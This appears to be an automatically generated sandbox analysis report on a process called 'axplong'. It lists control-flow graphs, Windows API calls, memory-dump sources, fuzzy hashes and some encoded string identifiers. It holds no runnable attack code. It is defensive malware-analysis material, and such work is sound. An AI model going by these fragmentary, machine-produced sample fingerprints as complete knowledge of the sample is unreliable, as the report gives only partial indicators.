                          • API String ID: 0-3963862150
                          • Opcode ID: 1c9c49138d59c790aa354c06b015c64fd08db9d74c008894af8a63db649a4b98
                          • Instruction ID: 4704c0752a6d888a9c2094fc1ab45e12d81d74e3ee46c732dbb1b2991d4e61eb
                          • Opcode Fuzzy Hash: 1c9c49138d59c790aa354c06b015c64fd08db9d74c008894af8a63db649a4b98
                          • Instruction Fuzzy Hash: 3EE19E71910218ABEB24DFA4CC8DBDEB779AF04304F5042D9E409A7291DB74ABD8CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1006 267d00-267d82 call 294020 1010 26827e-26829b call 27cf21 1006->1010 1011 267d88-267db0 call 277870 call 265b20 1006->1011 1018 267db4-267dd6 call 277870 call 265b20 1011->1018 1019 267db2 1011->1019 1024 267dda-267df3 1018->1024 1025 267dd8 1018->1025 1019->1018 1028 267e24-267e4f 1024->1028 1029 267df5-267e04 1024->1029 1025->1024 1030 267e80-267ea1 1028->1030 1031 267e51-267e60 1028->1031 1032 267e06-267e14 1029->1032 1033 267e1a-267e21 call 27d593 1029->1033 1036 267ea7-267eac 1030->1036 1037 267ea3-267ea5 GetNativeSystemInfo 1030->1037 1034 267e76-267e7d call 27d593 1031->1034 1035 267e62-267e70 1031->1035 1032->1033 1038 26829c call 296b9a 1032->1038 1033->1028 1034->1030 1035->1034 1035->1038 1043 267ead-267eb6 1036->1043 1037->1043 1044 2682a1-2682a6 call 296b9a 1038->1044 1047 267ed4-267ed7 1043->1047 1048 267eb8-267ebf 1043->1048 1049 26821f-268222 1047->1049 1050 267edd-267ee6 1047->1050 1052 267ec5-267ecf 1048->1052 1053 268279 1048->1053 1049->1053 1056 268224-26822d 1049->1056 1054 267ee8-267ef4 1050->1054 1055 267ef9-267efc 1050->1055 1058 268274 1052->1058 1053->1010 1054->1058 1059 267f02-267f09 1055->1059 1060 2681fc-2681fe 1055->1060 1061 268254-268257 1056->1061 1062 26822f-268233 1056->1062 1058->1053 1063 267f0f-267f6b call 277870 call 265b20 call 277870 call 265b20 call 265c60 1059->1063 1064 267fe9-2681e5 call 277870 call 265b20 call 277870 call 265b20 call 265c60 call 277870 call 265b20 call 265640 call 277870 call 265b20 call 277870 call 265b20 call 265c60 call 277870 call 265b20 call 265640 call 277870 call 265b20 call 277870 call 265b20 call 265c60 call 277870 call 265b20 call 265640 1059->1064 1069 268200-26820a 1060->1069 1070 26820c-26820f 1060->1070 1067 268265-268271 1061->1067 1068 268259-268263 1061->1068 1065 268235-26823a 1062->1065 1066 268248-268252 1062->1066 1092 267f70-267f77 1063->1092 1106 2681eb-2681f4 1064->1106 1065->1066 1073 26823c-268246 1065->1073 1066->1053 1067->1058 1068->1053 1069->1058 1070->1053 1071 268211-26821d 1070->1071 1071->1058 1073->1053 1094 267f7b-267f9b call 298a81 1092->1094 1095 267f79 1092->1095 1100 267fd2-267fd4 1094->1100 1101 267f9d-267fac 1094->1101 1095->1094 1105 267fda-267fe4 1100->1105 1100->1106 1103 267fc2-267fcf call 27d593 1101->1103 1104 267fae-267fbc 1101->1104 1103->1100 1104->1044 1104->1103 1105->1106 1106->1049 1110 2681f6 1106->1110 1110->1060
                          APIs
                          • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00267EA3
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                          • API String ID: 1721193555-2057465332
                          • Opcode ID: db354307f8cc2c9a1d88c2b02e8f47349013f17cf31af2b568f4584e23be3dba
                          • Instruction ID: db7b0f333fb119657bcf129ce09f2bd39f6a3b5aef677d3ce7734a347193c395
                          • Opcode Fuzzy Hash: db354307f8cc2c9a1d88c2b02e8f47349013f17cf31af2b568f4584e23be3dba
                          • Instruction Fuzzy Hash: 68D12470E206549BDF14BB68DC5A7AD7771AB42324F90428CE8196B3C2DF354EE48BD2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1144 296e01-296e36 GetFileType 1145 296e3c-296e47 1144->1145 1146 296eee-296ef1 1144->1146 1147 296e69-296e85 call 294020 GetFileInformationByHandle 1145->1147 1148 296e49-296e5a call 297177 1145->1148 1149 296f1a-296f42 1146->1149 1150 296ef3-296ef6 1146->1150 1159 296f0b-296f18 call 29740d 1147->1159 1165 296e8b-296ecd call 2970c9 call 296f71 * 3 1147->1165 1162 296e60-296e67 1148->1162 1163 296f07-296f09 1148->1163 1151 296f5f-296f61 1149->1151 1152 296f44-296f57 1149->1152 1150->1149 1155 296ef8-296efa 1150->1155 1157 296f62-296f70 call 27cf21 1151->1157 1152->1151 1167 296f59-296f5c 1152->1167 1155->1159 1160 296efc-296f01 call 297443 1155->1160 1159->1163 1160->1163 1162->1147 1163->1157 1180 296ed2-296eea call 297096 1165->1180 1167->1151 1180->1151 1183 296eec 1180->1183 1183->1163
                          APIs
                          • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00296E23
                          • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00296E7D
                          • __dosmaperr.LIBCMT ref: 00296F12
                            • Part of subcall function 00297177: __dosmaperr.LIBCMT ref: 002971AC
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: File__dosmaperr$HandleInformationType
                          • String ID:
                          • API String ID: 2531987475-0
                          • Opcode ID: a111f64b4c54d6e72d718f60cb57622b3e35e248e0f5e009cef186b6ae753239
                          • Instruction ID: f1d35e34e32a26ceec1421c20604ad610e08f449e15ee897172ba9324da0bbe9
                          • Opcode Fuzzy Hash: a111f64b4c54d6e72d718f60cb57622b3e35e248e0f5e009cef186b6ae753239
                          • Instruction Fuzzy Hash: 4E414C75920305ABDF24EFB5EC459AFBBF9EF88300B10442EF856D3611EA30A914CB61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1358 29d4f4-29d515 call 27deb0 1361 29d52f-29d532 1358->1361 1362 29d517 1358->1362 1364 29d54e-29d55a call 29a688 1361->1364 1365 29d534-29d537 1361->1365 1363 29d519-29d51f 1362->1363 1362->1364 1367 29d521-29d525 1363->1367 1368 29d543-29d54c call 29d43c 1363->1368 1376 29d55c-29d55f 1364->1376 1377 29d564-29d570 call 29d47e 1364->1377 1365->1368 1369 29d539-29d53c 1365->1369 1367->1364 1372 29d527-29d52b 1367->1372 1380 29d58c-29d595 1368->1380 1373 29d53e-29d541 1369->1373 1374 29d572-29d582 call 297443 call 296b8a 1369->1374 1372->1374 1378 29d52d 1372->1378 1373->1368 1373->1374 1374->1376 1381 29d6cb-29d6da 1376->1381 1377->1374 1391 29d584-29d589 1377->1391 1378->1368 1384 29d5a2-29d5b3 1380->1384 1385 29d597-29d59f call 298c8b 1380->1385 1389 29d5c9 1384->1389 1390 29d5b5-29d5c7 1384->1390 1385->1384 1394 29d5cb-29d5dc 1389->1394 1390->1394 1391->1380 1395 29d64a-29d65a call 29d687 1394->1395 1396 29d5de-29d5e0 1394->1396 1407 29d6c9 1395->1407 1408 29d65c-29d65e 1395->1408 1398 29d6db-29d6dd 1396->1398 1399 29d5e6-29d5e8 1396->1399 1400 29d6df-29d6e6 call 298cd3 1398->1400 1401 29d6e7-29d6fa call 29651d 1398->1401 1403 29d5ea-29d5ed 1399->1403 1404 29d5f4-29d600 1399->1404 1400->1401 1425 29d708-29d70e 1401->1425 1426 29d6fc-29d706 1401->1426 1403->1404 1409 29d5ef-29d5f2 1403->1409 1410 29d640-29d648 1404->1410 1411 29d602-29d617 call 29d4eb * 2 1404->1411 1407->1381 1414 29d699-29d6a2 1408->1414 1415 29d660-29d676 call 29a531 1408->1415 1409->1404 1416 29d61a-29d61c 1409->1416 1410->1395 1411->1416 1434 29d6a5-29d6a8 1414->1434 1415->1434 1416->1410 1418 29d61e-29d62e 1416->1418 1424 29d630-29d635 1418->1424 1424->1395 1429 29d637-29d63e 1424->1429 1431 29d710-29d711 1425->1431 1432 29d727-29d738 RtlAllocateHeap 1425->1432 1426->1425 1430 29d73c-29d747 call 297443 1426->1430 1429->1424 1441 29d749-29d74b 1430->1441 1431->1432 1435 29d73a 1432->1435 1436 29d713-29d71a call 299c81 1432->1436 1439 29d6aa-29d6ad 1434->1439 1440 29d6b4-29d6bc 1434->1440 1435->1441 1436->1430 1448 29d71c-29d725 call 298cf9 1436->1448 1439->1440 1444 29d6af-29d6b2 1439->1444 1440->1407 1445 29d6be-29d6c6 call 29a531 1440->1445 1444->1407 1444->1440 1445->1407 1448->1430 1448->1432
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: hpG)
                          • API String ID: 0-1991059726
                          • Opcode ID: a577cddc49d09d4e29fbfe24ab22984db8aef9a3bf2ca71d29c92cc1865648d7
                          • Instruction ID: f97c0a20175938f0be8a364ccf4742103ee60ee04c5b6dcef724198bee3d9217
                          • Opcode Fuzzy Hash: a577cddc49d09d4e29fbfe24ab22984db8aef9a3bf2ca71d29c92cc1865648d7
                          • Instruction Fuzzy Hash: 8A611432D302168FDF25EFA8E8857EDB7B4EF56314F65811AE449AB250D6309C20EF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1452 2682b0-268331 call 294020 1456 268333-268338 1452->1456 1457 26833d-268365 call 277870 call 265b20 1452->1457 1458 26847f-26849b call 27cf21 1456->1458 1465 268367 1457->1465 1466 268369-26838b call 277870 call 265b20 1457->1466 1465->1466 1471 26838f-2683a8 1466->1471 1472 26838d 1466->1472 1475 2683aa-2683b9 1471->1475 1476 2683d9-268404 1471->1476 1472->1471 1477 2683cf-2683d6 call 27d593 1475->1477 1478 2683bb-2683c9 1475->1478 1479 268406-268415 1476->1479 1480 268431-268452 1476->1480 1477->1476 1478->1477 1483 26849c-2684a1 call 296b9a 1478->1483 1485 268427-26842e call 27d593 1479->1485 1486 268417-268425 1479->1486 1481 268454-268456 GetNativeSystemInfo 1480->1481 1482 268458-26845d 1480->1482 1487 26845e-268465 1481->1487 1482->1487 1485->1480 1486->1483 1486->1485 1487->1458 1492 268467-26846f 1487->1492 1495 268471-268476 1492->1495 1496 268478-26847b 1492->1496 1495->1458 1496->1458 1497 26847d 1496->1497 1497->1458
                          APIs
                          • GetNativeSystemInfo.KERNELBASE(?), ref: 00268454
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: edad4277a8a1b7ca15ab274f247b832e0995c8cf86d08601acb216cf2c8044af
                          • Instruction ID: 8d60901163b661a1267d817cf47bf53fb3f04eef5a2cb8f4875fd80a2d2bdf9d
                          • Opcode Fuzzy Hash: edad4277a8a1b7ca15ab274f247b832e0995c8cf86d08601acb216cf2c8044af
                          • Instruction Fuzzy Hash: 19513970D202199BEB14EF68CD45BEDB775EB45304F904399E808A73C1EF705AE08B91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1498 296c99-296ca5 1499 296cc4-296ce8 call 294020 1498->1499 1500 296ca7-296cc3 call 297430 call 297443 call 296b8a 1498->1500 1505 296cea-296d04 call 297430 call 297443 call 296b8a 1499->1505 1506 296d06-296d28 CreateFileW 1499->1506 1530 296d72-296d76 1505->1530 1509 296d38-296d3f call 296d77 1506->1509 1510 296d2a-296d2e call 296e01 1506->1510 1521 296d40-296d42 1509->1521 1517 296d33-296d36 1510->1517 1517->1521 1522 296d64-296d67 1521->1522 1523 296d44-296d61 call 294020 1521->1523 1526 296d69-296d6f 1522->1526 1527 296d70 1522->1527 1523->1522 1526->1527 1527->1530
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 77f4e5fa17a5ba4d51daa1934eddbf4a6cde04554a6bb851bb3cbc4c71092c13
                          • Instruction ID: fa360d73f20cc0f713d3986a6c4b971ef3b9432fe5009b0fceb30cff12bd7e2c
                          • Opcode Fuzzy Hash: 77f4e5fa17a5ba4d51daa1934eddbf4a6cde04554a6bb851bb3cbc4c71092c13
                          • Instruction Fuzzy Hash: 07210772A252087AEF117F649C46FAF37A99F42378F200311F9343B1D1DBB05E259AA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1532 296f71-296f87 1533 296f89-296f8d 1532->1533 1534 296f97-296fa7 1532->1534 1533->1534 1535 296f8f-296f95 1533->1535 1539 296fa9-296fbb SystemTimeToTzSpecificLocalTime 1534->1539 1540 296fe7-296fea 1534->1540 1536 296fec-296ff7 call 27cf21 1535->1536 1539->1540 1542 296fbd-296fdd call 296ff8 1539->1542 1540->1536 1544 296fe2-296fe5 1542->1544 1544->1536
                          APIs
                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00296FB3
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$LocalSpecificSystem
                          • String ID:
                          • API String ID: 2574697306-0
                          • Opcode ID: 48a8cd8ab6c67ab7a0fd8c4540f794798d14bfe9ad4e5e6134ba14fe3381aac2
                          • Instruction ID: cc2e8c7472bf54de6a1d4b214541c9fa6cc45d4339ae5240f7603cf4f9b8b015
                          • Opcode Fuzzy Hash: 48a8cd8ab6c67ab7a0fd8c4540f794798d14bfe9ad4e5e6134ba14fe3381aac2
                          • Instruction Fuzzy Hash: 21111CB291020DABDF01DED5D948EDFB7FCAB08314F604266E516E2180EB30EB54CB61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1545 29d6ef-29d6fa 1546 29d708-29d70e 1545->1546 1547 29d6fc-29d706 1545->1547 1549 29d710-29d711 1546->1549 1550 29d727-29d738 RtlAllocateHeap 1546->1550 1547->1546 1548 29d73c-29d747 call 297443 1547->1548 1555 29d749-29d74b 1548->1555 1549->1550 1552 29d73a 1550->1552 1553 29d713-29d71a call 299c81 1550->1553 1552->1555 1553->1548 1558 29d71c-29d725 call 298cf9 1553->1558 1558->1548 1558->1550
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0029A5ED,?,002974AE,?,00000000,?), ref: 0029D731
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: ac2aa886d1583d5a458cc3621b9a0e61123d94b9a54b7f616829c703163f658e
                          • Instruction ID: 7e2bb4f78edae80290a7243ec7fcd816659e2314f8ec6a898843d3f13667cb7a
                          • Opcode Fuzzy Hash: ac2aa886d1583d5a458cc3621b9a0e61123d94b9a54b7f616829c703163f658e
                          • Instruction Fuzzy Hash: F4F0E93167512667DF212EA6AC05BDBF7999F817B0B184112AC089A181CA60E82066E1

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                          • Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_axplong.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: f87da9f4f0c7af2ab8408bdccd6452fc0242ec462281ec2ecbf92c5bb547027f
                          • Instruction ID: 9f0d09109f26f903504d01bfc2c0cf4aef8fa60211625a5eefdc7198cad82f6d
                          • Opcode Fuzzy Hash: f87da9f4f0c7af2ab8408bdccd6452fc0242ec462281ec2ecbf92c5bb547027f
                          • Instruction Fuzzy Hash: DAF0F931E20614EBC700BBA8DC07B1D7B74AB07764F904748E825672D1DB705A248BD3
                          Memory Dump Source
                          • Source File: 00000008.00000002.3436521034.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4ca0000_axplong.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cce6dc5b112f1557e8e1bcee82f222cd597b4a08699f350682b9e98854d5c9d1
                          • Instruction ID: 79a8591989089be6fc736c94f529bbb78bb8e7b4e365065cebdf1f4d3ca562f5
                          • Opcode Fuzzy Hash: cce6dc5b112f1557e8e1bcee82f222cd597b4a08699f350682b9e98854d5c9d1
                          • Instruction Fuzzy Hash: 45E0F1E31084125BD74235E79F382FB6756E7532F93340537F043C21839C852154B272
                          Memory Dump Source
                          • Source File: 00000008.00000002.3436521034.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4ca0000_axplong.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edef89189ebaa5318e604c65d37863f4cc0b960c0754f70604a6969e69eda3a8
                          • Instruction ID: 398b712a590da4bf794cd022962b29daa166168b6c51fe30cdb1401c2ba48a6b
                          • Opcode Fuzzy Hash: edef89189ebaa5318e604c65d37863f4cc0b960c0754f70604a6969e69eda3a8
                          • Instruction Fuzzy Hash: FAE05C9300451257D7422A9799246F66756E6231BC3380967E042C2143DD962155A6B1
                          Memory Dump Source
                          • Source File: 00000008.00000002.3436521034.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4ca0000_axplong.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b134384c14a30d3c069c54b68ff8c1509ec3c50e3cd148a939feb77cdce609b
                          • Instruction ID: 6cbb3687a8466d819de650c8b220917d0cb380aab4b6dc91148d928b06a1011b
                          • Opcode Fuzzy Hash: 0b134384c14a30d3c069c54b68ff8c1509ec3c50e3cd148a939feb77cdce609b
                          • Instruction Fuzzy Hash: 61E0F1F30086514FEB026956CD206F7779AEB132B5314057BD052C3383EAD53040B556
                          APIs
                          Strings
                          Memory Dump Source
